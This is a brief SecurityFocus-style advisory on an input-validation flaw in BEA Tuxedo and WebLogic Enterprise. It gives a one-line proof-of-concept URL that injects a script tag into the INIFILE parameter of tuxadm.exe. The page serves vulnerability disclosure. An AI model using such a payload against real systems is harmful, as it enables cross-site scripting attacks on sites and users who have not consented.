BEA Tuxedo and WebLogic Enterprise Input Validation Vulnerability

The following proof of concept has been provided:

http://www.example.com/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=<script>alert('XSS')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus